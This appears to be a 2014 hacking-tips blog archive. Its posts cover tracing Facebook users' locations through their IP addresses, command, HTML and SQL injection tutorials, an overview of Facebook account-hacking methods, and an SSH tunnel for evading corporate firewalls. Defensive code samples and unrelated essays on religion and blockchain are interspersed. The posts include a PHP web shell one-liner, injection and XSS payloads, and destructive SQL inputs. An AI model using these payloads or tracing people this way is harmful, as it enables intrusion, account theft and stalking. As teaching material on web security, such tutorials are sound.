Zicutake [Audio]


Tuesday, December 30, 2014

Trace Facebook Friends Location While Chatting

Trace Unknown Facebook Users Location While Chatting
There are many reasons you might want to know a Facebook user's location. For example, you receive a message from an unknown person with whom you have never interacted before. I do not believe what a Facebook user's timeline looks like. Here is a cool and simple way to trace any friend on Facebook. It's the most useful Facebook trick. If you have unknown friends in your Facebook account and after some time you believe that he/she is a fake person, then with the help of this Facebook trick you can trace their actual location. I often accept many unknown friend requests. One day, a Facebook friend of mine started commenting badly on my posts, and when I looked at his timeline I found England as his current city, so I started researching this. Finally I came to know his geolocation along with his ISP.
Here are the steps to reveal a Facebook friend's location.
First of all, you have to find the IP address of a specific user.
To do so we will be using the netstat command in Windows. Just invite or ping him for a chat. As soon as you start the chat, open Command Prompt (cmd) from your PC: click Start > Run > cmd.
Note: Before trying this, make sure you close all the other tabs in your browser and keep only the Facebook tab open. Also clear the history and cache from your browser.
1. Now the next step for this Facebook trick: open the command prompt, type netstat -an and hit the Enter key.
You will get the IP addresses of all established connections there. Note down all the suspicious IP addresses.
2. The other step is to trace the IP address that you found in step 1.
3. Go to IP Location Finder - Geolocation, where you will see your own IP address. Delete it, paste the IP address of your friend in the given box and click the Query button.
Now it will show you all the information about that user, including his ISP and location. Use this trick only if you have a problem with some unknown friends.

Monday, December 29, 2014

How to Perform Command Injection Attacks

Command injection tutorial
Introduction: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
How to Perform Command Injection Attacks
In this article, we will talk about the varieties of command injection and how they can be executed. There are a variety of ways to inject shell commands. Assume for a moment that you have found a page which takes a filename as an argument and executes the shell command "cat" against that file. For example, a semicolon was used to separate one command from another, to indicate that after the cat command completed, another function should be called in the same line. There are a number of ways to string shell commands together to create new commands.
Here are the common operators you can use, as well as examples of how they might be used in an attack:

Redirection Operators
Examples: <, >>, >
These operators redirect either input or output somewhere else on the server. < will make whatever comes after it standard input. Replacing the filename with < filename will not change the output, but could be used to avoid some filters. > redirects command output, and can be used to modify files on the server, or create new ones altogether. Combined with the cat command, it could easily be used to add unix users to the system, or deface the website. Finally, >> appends text to a file and is not much different from the original output modifier, but again can be used to avoid some simplistic detection schemes.

Pipes
Examples: |
Pipes allow the user to chain multiple commands. It will redirect the output of one command into the next. So you can run unlimited commands by chaining them with multiple pipes, such as cat file1 | grep "string".

Inline commands
Examples: ;, $
This is the original example. Putting a semicolon asks the command line to execute everything before the semicolon, then execute everything else as if on a fresh command line.

Logical Operators
Examples: $, &&, ||
These operators perform some logical operation against the data before and after them on the command line.
Common Injection Patterns & Results
Here are the expected results from a number of common injection patterns (appending the below to a given input string, assuming all quotes are correctly paired):
`shell_command` - executes the command
$(shell_command) - executes the command
| shell_command - executes the command and returns the output of the command
|| shell_command - executes the command and returns the output of the command
; shell_command - executes the command and returns the output of the command
&& shell_command - executes the command and returns the output of the command
> target_file - overwrites the target file with the output of the previous command
>> target_file - appends the target file with the output of the previous command
< target_file - send contents of target_file to the previous command
- operator - Add additional operations to target command
These examples are only scratching the surface of possible command injection vectors. The full breadth of attack possibilities is dependent upon the underlying function calls. For instance, if an underlying function is using a shell program such as awk, many more attack possibilities arise than laid out here.
Finally, command injection can be more subtle than finding applications which directly call underlying operating system functions. If it is possible to inject code, say PHP code, then you can also perform command injections. Assume you find an application with a PUT vulnerability on a site which is PHP enabled. An attacker could simply upload a PHP file with a single line to have full access to a shell:
<?php echo shell_exec('cat '.$_GET['command']); ?>
Thus, it should be noted that many types of attacks, including SQL injection, have shell injection as a primary end goal for gaining control of the server.
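The "cat a user-supplied filename" case above, seen from the defending side, as an added example that is not part of the original article: the same inputs are passed to a shell string, to an argument vector without a shell, and to a validated in-process read. The file name notes.txt, the function names and the harmless echo marker are assumptions made for the illustration.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Allowlist for a bare file name: no '/', no shell metacharacters, and no
# leading '-' or '.' (so no option injection and no '..').
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*")

# Constructed sample inputs: operators from the list above, with a harmless
# `echo` standing in for the injected command.
PAYLOADS = [
    "notes.txt; echo INJECTED",
    "notes.txt && echo INJECTED",
    "notes.txt | echo INJECTED",
    "nosuchfile || echo INJECTED",
]


def cat_shell_string(base, name):
    """Vulnerable pattern: input concatenated into a string run by a shell."""
    proc = subprocess.run("cat " + name, shell=True, cwd=base,
                          capture_output=True, text=True)
    return proc.stdout


def cat_argv(base, name):
    """No shell: the whole input is one argv element; '--' ends option parsing."""
    proc = subprocess.run(["cat", "--", name], cwd=base,
                          capture_output=True, text=True)
    return proc.stdout


def cat_validated(base, name):
    """Allowlist the name, confine it to the base directory, read in-process."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("file name not allowed")
    root = Path(base).resolve()
    target = (root / name).resolve()
    if target.parent != root:  # e.g. a symlink that points outside the directory
        raise ValueError("path escapes base directory")
    return target.read_text()


def run_demo():
    """Run every payload through the three variants and report what happened."""
    rows = []
    with tempfile.TemporaryDirectory() as base:
        Path(base, "notes.txt").write_text("hello\n")
        for payload in PAYLOADS:
            try:
                cat_validated(base, payload)
                validated = "accepted"
            except ValueError:
                validated = "rejected"
            rows.append({
                "payload": payload,
                "shell_string_ran_it": "INJECTED" in cat_shell_string(base, payload),
                "argv_ran_it": "INJECTED" in cat_argv(base, payload),
                "validated": validated,
            })
        legit = cat_validated(base, "notes.txt")
    return rows, legit


if __name__ == "__main__":
    results, content = run_demo()
    for row in results:
        print(row)
    print("legitimate read:", repr(content))
```

Validation alone is the weaker of the two controls; keeping the input out of a shell is what removes the operators' meaning.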

Saturday, December 27, 2014

Top 10 Facebook Hacking Techniques

Top 10 Facebook hacking techniques
There are many ways to break into a Facebook account, and we have collected the 10 most usual techniques.

1. Phishing
Phishing is still the most popular attack vector used for hacking Facebook accounts. There are a variety of methods to carry out a phishing attack. In a simple phishing attack, a hacker creates a fake login page which looks exactly like the real Facebook page and then asks the victim to log in. Once the victim logs in through the fake page, the victim's "Email Address" and "Password" are stored in a text file, and the hacker then downloads the text file and gets his hands on the victim's credentials. Some auto-liker websites are good examples of phishing. They ask a user to log in for an access token in order to get the username and password of the victim. [Beware]

2. Keylogging
Keylogging is the easiest way to hack a Facebook password. Keylogging can sometimes be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which, once installed on the victim's computer, will record everything the victim types on his/her computer. The logs are then sent back to the attacker either by FTP or directly to the hacker's email address.

3. Stealers
Almost 80% of people use stored passwords in their browser to access Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealers are software specially designed to capture the saved passwords stored in the victim's Internet browser.

4. Session Hijacking
Session hijacking can often be very dangerous if you are accessing Facebook on an http (non-secure) connection. In a session hijacking attack, a hacker steals the victim's browser cookie, which is used to authenticate the user on a website, and uses it to access the victim's account. Session hijacking is widely used on LAN and WiFi connections.

5. Sidejacking With Firesheep
Sidejacking attacks became common in late 2010, and they are still popular nowadays. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim are on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.

6. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. If the hacker can gain access to the victim's mobile phone, then he can probably gain access to his/her Facebook account. There are a lot of mobile spying software packages used to monitor a cellphone. The most popular mobile phone spying software are: Mobile Spy and Spy Phone Gold.

7. DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack to replace the original Facebook page with his own fake page and hence get access to the victim's Facebook account.

8. USB Hacking
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.

9. Man In the Middle Attack
If the victim and attacker are on the same LAN and on a switch-based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capture all the traffic in between.

10. Botnets
Botnets are not commonly used for hacking Facebook accounts, because of their high setup costs. They are used to carry out more advanced attacks. A botnet is basically a collection of compromised computers. The infection process is the same as for keylogging; however, a botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.

Thursday, December 25, 2014

HTML Code Injection Technique

HTML code injection techniques
Introduction: This article is about HTML injection techniques used to exploit web site vulnerabilities. Nowadays, it's not usual to find a site completely vulnerable to this type of attack, but only one is enough to exploit it. I'll make a compilation of these techniques all together, in order to facilitate the reading and to make it entertaining. HTML injection is a type of attack focused upon the way HTML content is generated and interpreted by browsers at the client side. In addition, JavaScript is a widely used technology in dynamic web sites, so the use of techniques based on it, like injection, complements the nomenclature of 'code injection'.

Code Injection
This type of attack is possible because the client browser, by default, interprets scripts embedded within HTML content, so if an attacker embeds script tags such as <SCRIPT>, <OBJECT>, <APPLET>, or <EMBED> into a web site, the web browser's JavaScript engine will execute them. Typical targets of this type of injection are forums, guestbooks, or any section where the administrator allows the insertion of text comments; if the web site does not parse the inserted comments and takes < or > as real chars, a malicious user could type:
I like this site because <script>alert('Injected!');</script> teaches me a lot
If it works and you can see the message box, the door is opened to the attacker's imagination limits! A common code insertion used to drive navigation to another website is something like this:
<H1> Vulnerability test </H1> <META HTTP-EQUIV="refresh" CONTENT="1;url=http://www.test.com">
Same within a <FK> or <LI> tag:
<FK STYLE="behavior: url(http://<<Other website>>;">
Other tags used to execute malicious JavaScript code are, for example, <BR>, <DIV>, even background-image:
<BR SIZE="&{alert('Injected')}"><DIV STYLE="background-image: url(javascript:alert('Injected'))">
The <title> tag is a common weak point if it's generated dynamically. For example, suppose this situation:
<HTML>
<HEAD>
<TITLE>
<?php echo $_GET['titulo']; ?>
</TITLE>
</HEAD>
<BODY>
...
</BODY>
</HTML>
If you set the title to 'example </title> </head> </body><img src=http://myImage.png>', the resulting HTML would insert the 'myImage.png' image first of all:
<HTML>
<HEAD>
<TITLE>
example
</TITLE>
</HEAD>
<BODY><img src=http://myImage.png>
</TITLE>
</HEAD>
<BODY>
...
</BODY>
</HTML>
There is another dangerous HTML tag that could exploit a web browser's frames support: <IFRAME>. This tag allows (within the sandbox security layer) cross-scripting exploits using web browser elements (address bar or bookmarks, for example), but this topic is outside the scope of this article.
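The fix for the comment and <title> cases above is to encode user input for the context it lands in. The following is an added example, not code from the original article: it renders the article's own test strings with and without encoding and parses both results to see which tags the browser would be handed. The function names, the page template and the http/https allowlist are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # assumed policy for user-supplied links

# Test strings taken from the article text above.
TITLE = "example </title> </head> </body><img src=http://myImage.png>"
COMMENT = "I like this site because <script>alert('Injected!');</script> teaches me a lot"
LINK = "javascript:alert('Injected')"


def safe_url(value):
    """Return the URL only if it is absolute http(s); otherwise a dead link."""
    value = value.strip()
    try:
        parts = urlsplit(value)
    except ValueError:
        return "#"
    if parts.scheme.lower() in ALLOWED_SCHEMES and parts.netloc:
        return value
    return "#"


def render_unsafe(title, comment):
    """The pattern the article describes: input pasted straight into markup."""
    return ("<html><head><title>" + title + "</title></head>"
            "<body><p>" + comment + "</p></body></html>")


def render_escaped(title, comment, link):
    """Same page with text and attribute values HTML-encoded, URL scheme checked."""
    return ("<html><head><title>" + html.escape(title) + "</title></head>"
            "<body><p>" + html.escape(comment) + "</p>"
            '<a href="' + html.escape(safe_url(link)) + '">source</a>'
            "</body></html>")


class TagCollector(HTMLParser):
    """Records every start tag and href value found in a document."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.hrefs += [value for key, value in attrs if key == "href"]


def inspect(markup):
    """Return (start tags, href values) found in the markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.hrefs


if __name__ == "__main__":
    print("unsafe :", inspect(render_unsafe(TITLE, COMMENT)))
    print("escaped:", inspect(render_escaped(TITLE, COMMENT, LINK)))
```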

Wednesday, December 24, 2014

Motivational Posters for All

The problem with those motivational posters that people keep sharing all over Facebook is that they’re often tailored to a specific way of thinking, usually either spiritual, religious or rational.  To be a little more accommodating I therefore thought I’d create a few motivational posters that provide a common message but are written in the three languages of spiritualism, religion and rationalism, that way you can share them with everyone without compromising their meaning.




SSH Tunnel Tutorial

Introduction: An SSH tunnel consists of an encrypted tunnel created through an SSH protocol connection. An SSH tunnel can be used to transfer unencrypted traffic over a network through an encrypted channel. For example, we can use an SSH tunnel to securely transfer files between an FTP server and a client even though the FTP protocol itself is not encrypted. SSH tunnels also provide a means to bypass firewalls that prohibit or filter certain internet services. For example, an organization will block certain sites using its proxy filter. But users may not wish to have their web traffic monitored or blocked by the organization's proxy filter. If users can connect to an external SSH server, they can create an SSH tunnel to forward a given port on their local machine to port 80 on a remote web server via the external SSH server.
This ssh tunnel tutorial will deliberately bypass a firewall, and security admins will frown (at the very least) on you bypassing a corporate firewall.
*. How to encrypt anything over SSH tunnel using a Socks Proxy.
*. How to Browse Securely from hotspots or hide from corporate firewalls/sniffers.

SSH Tunnel Summary
Using an ssh server that has internet access as a browsing point, you will create an ssh tunnel from your local PC to a remote server, source all of your traffic from it, and encrypt communications to it using free software. This tutorial will show you how to set up an SSH tunnel and use it to create a Socks Proxy. It requires an SSH account anywhere, even your home PC with cygwin or ubuntu installed. You could then use this to tunnel from an unsafe place and browse as if you were at the safe, remote location instead. This is free.

SSH Tunnel Instructions
1. Find your current IP: go to whatismyip.com and look at your existing IP, without proxy.
Reason: compare later when we have a tunnel.
2. Packet Capture
Th: !(ipv6.dst == ff02::1) && !(ipv6.dst == ff02::c) && !stp && !cdp && !dtp && !dhcpv6 && !arp && !nbns && !browser && !icmpv6 && !ip.src== 192.168.1.105 &&
Reason: verify that you are truly encrypted. This filter just hides network chatter. It's the same thing a snooper would see. Your filter may be different, or not required. I was on a chatty network when I inspected and thought this example would be worth showing.
3. Setup Putty for SSH Tunnel:
*. Session: user@yourserver.com:22
*. Connection > SSH: V2, Enable Compression
*. Connection > SSH > Tunnels > Source: 7070, Dynamic, ADD
*. Session: Save, Open
Or, create an SSH tunnel via command line:
ssh -D 7070 -p 22 user@yourserver.com sleep 9999
Reason: sets up loopback port (7070) on your local PC and connects over port 22 to the remote shell
4. Setup Firefox to use the tunnel:
*. Tools > Options > Network > Settings > Manual
*. Socks: 127.0.0.1:7070
*. Click OK.
5. Setup Firefox to use Remote DNS
about:config network.proxy.socks_remote_dns=true
Reason: By default, your local PC will do the DNS lookups, but that will show what websites you are going to, so this step sends DNS over the ssh tunnel.
6. Restart Browser
Reason: configures firefox to route traffic through the tunnel you just made
7. Test
*. View everything is over port 22
*. View IP is different from whatismyip.com
*. View filter in wireshark: dns, there should be no entries.
References
*. https://addons.mozilla.org/en-US/thunderbird/user/323/ (foxyproxy allows quick proxy swaps in mozilla, thunderbird, etc).
*. ftp://ftp.chiark.greenend.org.uk/users/sgtatham/putty-latest/x86/putty.exe
*. http://www.wireshark.org/download.html
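Why step 5 changes what a local observer sees comes down to how a SOCKS5 client names its destination. This added example, not part of the original tutorial, builds the SOCKS5 CONNECT request (RFC 1928) both ways and parses it back; the host name, the 192.0.2.10 address and the stub resolver are constructed for illustration.

```python
import ipaddress
import struct


def socks5_connect_request(host, port, remote_dns, resolver=None):
    """Build the CONNECT request a browser sends to the local SOCKS port.

    remote_dns=True  -> ATYP 0x03: the host name travels inside the tunnel and
                        the far end resolves it (socks_remote_dns=true).
    remote_dns=False -> the client resolves the name itself first, which is an
                        ordinary DNS query on the local network, then sends the
                        resulting address (ATYP 0x01 IPv4 / 0x04 IPv6).
    """
    if remote_dns:
        name = host.encode("idna")
        if not 1 <= len(name) <= 255:
            raise ValueError("host name length out of range")
        addr = b"\x03" + bytes([len(name)]) + name
    else:
        ip = ipaddress.ip_address(resolver(host))  # the local lookup happens here
        addr = (b"\x01" if ip.version == 4 else b"\x04") + ip.packed
    # VER=5, CMD=1 (CONNECT), RSV=0, then address and big-endian port.
    return b"\x05\x01\x00" + addr + struct.pack("!H", port)


def describe_request(data):
    """Parse a CONNECT request and say where name resolution took place."""
    version, command, _reserved, atyp = data[:4]
    if version != 5 or command != 1:
        raise ValueError("not a SOCKS5 CONNECT request")
    if atyp == 3:
        length = data[4]
        dest, rest, dns = data[5:5 + length].decode("ascii"), data[5 + length:], "remote"
    elif atyp == 1:
        dest, rest, dns = str(ipaddress.IPv4Address(data[4:8])), data[8:], "local"
    elif atyp == 4:
        dest, rest, dns = str(ipaddress.IPv6Address(data[4:20])), data[20:], "local"
    else:
        raise ValueError("unknown address type")
    return {"dns": dns, "dest": dest, "port": struct.unpack("!H", rest[:2])[0]}


def stub_resolver(name):
    """Constructed stand-in for the operating system resolver."""
    return {"example.com": "192.0.2.10"}[name]


if __name__ == "__main__":
    for remote in (True, False):
        req = socks5_connect_request("example.com", 443, remote, stub_resolver)
        print(req.hex(), describe_request(req))
```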

SSH Tunnel NOT SAFE
Is all browsing now encrypted? No, it’s only encrypted to the remote server. From that point on it’s normal. Though if you were browsing an https connection without cookies, it’s pretty hard to figure out what your traffic is. Cookies are relatively simple to capture, sniff then replay for a man in the middle type attack or privileged login.

Monday, December 22, 2014

SQL Injection: SQL for Web Pages

SQL Injection

SQL in Web Pages

When SQL is used to display data on a web page, it is common to let web users input their own search values. Since SQL statements are text only, it is easy, with a little piece of computer code, to dynamically change SQL statements to provide the user with selected data:
Server Code
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
The example above creates a select statement by adding a variable (txtUserId) to a select string. The variable is fetched from the user input (Request) to the page. The rest of this chapter describes the potential dangers of using user input in SQL statements.

SQL Injection

SQL injection is a technique where malicious users can inject SQL commands into an SQL statement, via web page input. Injected SQL commands can alter SQL statement and compromise the security of a web application.

SQL Injection Based on 1=1 is Always True

Look at the example above, one more time. Let's say that the original purpose of the code was to create an SQL statement to select a user with a given user id. If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this:
UserId: 105 or 1=1
Server Result
SELECT * FROM Users WHERE UserId = 105 or 1=1
The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true. Does the example above seem dangerous? What if the Users table contains names and passwords? The SQL statement above is much the same as this:
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1
A smart hacker might get access to all the user names and passwords in a database by simply inserting 105 or 1=1 into the input box.

SQL Injection Based on ""="" is Always True

Here is a common construction, used to verify user login to a web site:
User Name:
Password:
Server Code
uName = getRequestString("UserName");
uPass = getRequestString("UserPass");
sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"'
A smart hacker might get access to user names and passwords in a database by simply inserting " or ""=" into the user name or password text box. The code at the server will create a valid SQL statement like this:
Result
SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
The result SQL is valid. It will return all rows from the table Users, since WHERE ""="" is always true.

SQL Injection Based on Batched SQL Statements

Most databases support batched SQL statements, separated by semicolons.
Example
SELECT * FROM Users; DROP TABLE Suppliers
The SQL above will return all rows in the Users table, and then delete the table called Suppliers. If we had the following server code:
Server Code
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
And the following input:
User id: 105; DROP TABLE Suppliers
The code at the server would create a valid SQL statement like this:
Result
SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers

Parameters for Protection

Some web developers use a "blacklist" of words or characters to search for in SQL input, to prevent SQL injection attacks. This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks) are used in common language, and should be allowed in many types of input. In fact it should be perfectly legal to input an SQL statement in a database field. The only proven way to protect a web site from SQL injection attacks is to use SQL parameters. SQL parameters are values that are added to an SQL query at execution time, in a controlled manner.
ASP.NET Razor Example
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = @0";
db.Execute(txtSQL,txtUserId);
Note that parameters are represented in the SQL statement by a @ marker. The SQL engine checks each parameter to ensure that it is correct for its column, and parameters are treated literally, not as part of the SQL to be executed.
Another Example
txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
db.Execute(txtSQL,txtNam,txtAdd,txtCit);
Examples
The following examples show how to build parameterized queries in some common web languages.
ASP.NET SELECT
txtUserId = getRequestString("UserId");
sql = "SELECT * FROM Customers WHERE CustomerId = @0";
command = new SqlCommand(sql);
command.Parameters.AddWithValue("@0",txtUserId);
command.ExecuteReader();
ASP.NET INSERT INTO
txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
command = new SqlCommand(txtSQL);
command.Parameters.AddWithValue("@0",txtNam);
command.Parameters.AddWithValue("@1",txtAdd);
command.Parameters.AddWithValue("@2",txtCit);
command.ExecuteNonQuery();
PHP INSERT INTO
$stmt = $dbh->prepare("INSERT INTO Customers (CustomerName,Address,City) VALUES (:nam, :add, :cit)");
$stmt->bindParam(':nam', $txtNam);
$stmt->bindParam(':add', $txtAdd);
$stmt->bindParam(':cit', $txtCit);
$stmt->execute();
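The difference between concatenation and parameters can be checked end to end against a throwaway database. This is an added example, not from the original article: it runs the article's inputs through both styles using Python's built-in sqlite3 module. The table contents and function names are constructed, and executescript() stands in for a driver that accepts batched statements.

```python
import sqlite3


def make_db():
    """In-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Users (UserId INTEGER, Name TEXT, Pass TEXT);
        INSERT INTO Users VALUES (105, 'alice', 'a-pass'),
                                 (106, 'bob',   'b-pass'),
                                 (107, 'carol', 'c-pass');
        CREATE TABLE Suppliers (SupplierId INTEGER, Name TEXT);
        INSERT INTO Suppliers VALUES (1, 'Acme');
    """)
    return conn


def lookup_concat(conn, user_id):
    """Vulnerable: the input becomes part of the SQL text."""
    sql = "SELECT UserId, Name FROM Users WHERE UserId = " + user_id
    return conn.execute(sql).fetchall()


def batch_concat(conn, user_id):
    """Vulnerable, on a driver that runs batches: every statement executes."""
    conn.executescript("SELECT UserId, Name FROM Users WHERE UserId = " + user_id)


def lookup_param(conn, user_id):
    """Parameterized: the input is bound as one value, never parsed as SQL."""
    sql = "SELECT UserId, Name FROM Users WHERE UserId = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def login_param(conn, name, password):
    """Parameterized login check; quote characters are just data."""
    sql = "SELECT UserId FROM Users WHERE Name = ? AND Pass = ?"
    return conn.execute(sql, (name, password)).fetchall()


def table_exists(conn, table):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (table,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("concat, '105 or 1=1':", lookup_concat(db, "105 or 1=1"))
    print("param,  '105 or 1=1':", lookup_param(db, "105 or 1=1"))
    print("param,  '105'       :", lookup_param(db, "105"))
    print("param login         :", login_param(db, '" or ""="', '" or ""="'))
    batch_concat(db, "105; DROP TABLE Suppliers")
    print("Suppliers after batched concat:", table_exists(db, "Suppliers"))
    db2 = make_db()
    lookup_param(db2, "105; DROP TABLE Suppliers")
    print("Suppliers after parameterized :", table_exists(db2, "Suppliers"))
```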




Sunday, December 21, 2014

How To Extract All Hyperlinks In A Web Page

Sometimes you might need all the hyperlinks from a webpage. For example, if you are a developer you might need a JavaScript or CSS file of a webpage that is hosted externally. Sometimes this trick will also help you extract the download link from survey sites. Whatever the reason might be, let us learn to do this. We will learn three different ways to extract hyperlinks from a webpage in this post.

Extract Hyperlinks From A Webpage In Chrome

This trick is very simple but is limited to Google chrome users. The trick is performed via the Chrome Dev tools.
Steps To Extract Hyperlinks From A Webpage In Chrome
1. Go to the page from which you want to extract the hyperlinks.
2. Click on 'Inspect Element' from the right click menu.
3. Click on the 'Console tab'
4. Now paste the following code in the input field.
$$('a').forEach(function (a) { console.log(a.href); });
5. Hit enter.

iWeb Tools's Link Extractor

This is a web-based service, which means you don't have to download any software, nor is it limited to any users. You can use this tool here. This tool will show the type of file along with the anchor text in the output field.
How To Use This Tool?

Using this tool is very simple. All you have to do is go to the above url, enter the webpage url in the input field and hit extract.

BuzzStream Tool

This is quite different from the other two because in this case we are extracting all the urls from HTML code. This trick will not display the output links on the website itself. All the links on that page are exported as a CSV file which automatically downloads to your computer once you hit the create CSV button. The CSV file has three different columns: the actual link, its original website and the anchor text.
How To Use This Tool?
1. Go to Buzz Stream Urls Extract Tool.
2. Copy the source code of the webpage from which you want to extract the Url.
3. Paste it in the tool's input field and hit create CSV. A CSV file containing the hyperlinks will automatically be downloaded to your computer.

How To Get The Source Code Of Webpages

Chrome: Right click on the webpage and click on view page source or press Ctrl U.
Internet Explorer: Right click from the webpage and click on view source.
Firefox & Netscape: Right click and click on view page source or press Ctrl U.
Opera: From the view menu click on source or press Ctrl F3.

Wednesday, December 17, 2014

Rev. Libby Lane and Dr. Elena Piscopia

Dr. Elena Piscopia 
On the 25th June 1678 Elena Cornaro Piscopia earned a Doctorate in Philosophy at the University of Padua in Italy, making her the first woman to be awarded a doctorate. She would have earned a doctorate in theology had the Bishop of Padua not refused her doctorate of theology on the grounds that she was a woman. She later became a mathematics tutor at the University of Padua and was also considered an expert musician. Perhaps she would have been less successful had she tried to pursue a senior position in the Church.
Rev. Libby Lane
Over 336 years later on 17th December 2014 The Church of England appointed Reverend Libby Lane as its first female bishop. Surely an organisation that steadfastly still claims moral superiority over the faithless should have been first past the post rather than breathlessly wheezing as it finally stumbled over the equality line three centuries behind academia?

The problem with adopting an ideology rooted in a purported divinely revealed truth is that by its very nature it is extremely tricky to improve upon that divinely revealed truth in the light of new evidence and thinking without questioning the wisdom of the deity originally credited with it.

This particular example of lackadaisical Christian catch-up is therefore far from unprecedented.

Galileo was put on trial and condemned in 1616 and 1633 by the Roman Catholic Inquisition for contradicting its unquestionable scriptures by daring to use the scientific method to theorise that the earth in fact orbits the sun. It wasn’t until the 4th November 1992 that Pope John Paul II issued a weasel worded vindication of Galileo, long after the Church’s original position had become utterly untenable.

The speed at which the church was able to catch–up with what now seems to be such obvious and basic gender equality is laughable. But it will need to speed up its reform process to a rate that will be uncomfortable to many of its members if it wants to try and keep in touch with the modern world.

The only alternative to such sensible liberal reforms is to simply stand still. In a post-enlightened world where society, morality and equality are advancing at an accelerating rate, standing still and refusing to rethink frequently now manifests itself as bigotry, with fundamentalism not far behind.

As religious views on women bishops and gay marriages become more polarised how close are we to the ultimate Christian reform of jettisoning the supernatural mumbo jumbo altogether? Bereft of its divisive mystical claptrap surely Christianity could be distilled down to a laudable set of ideas about being nice to one another that we could all rally behind.

How long will it be before Christianity officially abandons the pious petitioning of supernatural beings, implausible virgin births, credulous miracles, the wicked threat of eternal damnation and the fabricated bribe of immortality to the bigots and fundamentalists who prefer to stand still?

I suspect it will be considerably less than the 336 years it took Libby to catch up with Elena, but in the meantime we still have the British Humanist Association. But when the Church finally embraces this ultimate reform I’ll be happy to go back; after all, they do have the better architecture.

 

Might pop into my local village Church for the Carol Service on Sunday though, I do like a nice sing-along at Xmas, as I think I mentioned last year.

Thursday, December 11, 2014

The dawn of trustworthy computing

When we currently use a smart phone or a laptop on a cell network or the Internet, the other end of these interactions typically runs on other solo computers, such as web servers. Practically all of these machines have architectures that were designed to be controlled by a single person or a hierarchy of people who know and trust each other. From the point of view of a remote web or app user, these architectures are based on full trust in an unknown "root" administrator, who can control everything that happens on the server: they can read, alter, delete, or block any data on that computer at will. Even data sent encrypted over a network is eventually unencrypted and ends up on a computer controlled in this total way. With current web services we are fully trusting, in other words we are fully vulnerable to, the computer, or more specifically the people who have access to that computer, both insiders and hackers, to faithfully execute our orders, secure our payments, and so on. If somebody on the other end wants to ignore or falsify what you've instructed the web server to do, no strong security is stopping them, only fallible and expensive human institutions which often stop at national borders.

The high vulnerability we have to web servers stands in sharp contrast to traditional commercial protocols, such as ticket-selling at a movie theater, that distribute a transaction so that no employee can steal money or resources undetected. There is no "root administrator" at a movie theater who can pocket your cash undetected.  Because, unlike a web server, these traditional protocols, called financial controls, can securely handle cash, you didn't have to fill out a form  to see a movie, shop for groceries, or conduct most other kinds of every-day commerce. You just plunked down some coin and took your stuff or your seat. Imperfect and slow as these processes often are (or were), these analog or paper-based institutions often provided security, financial control, and/or verifiability of fiduciary transactions in many ways far superior to what is possible on web servers, at much less hassle and privacy loss to customers. On the Internet, instead of securely and reliably handing over cash and getting our goods or services, or at least a ticket, we have to fill out forms and make ourselves vulnerable to identity theft in order to participate in e-commerce, and it often is very difficult to prohibitive to conduct many kinds of commerce, even purely online kinds, across borders and other trust boundaries. Today's computers are not very trustworthy, but they are so astronomically faster than humans at so many important tasks that we use them heavily anyway. We reap the tremendous benefits of computers and public networks at large costs of identity fraud and other increasingly disastrous attacks.

Recently developed and developing technology, often called "the block chain", is starting to change this. A block chain computer is a virtual computer, a computer in the cloud, shared across many traditional computers and protected by cryptography and consensus technology. A Turing-complete block chain with large state gives us this shared computer. Earlier efforts included state-machine replication (see list of papers linked below). QuixCoin is a recent and Ethereum is a current project that has implemented such a scheme. These block chain computers will allow us to put the most crucial parts of our online protocols on a far more reliable and secure footing, and make possible fiduciary interactions that we previously dared not do on a global network.

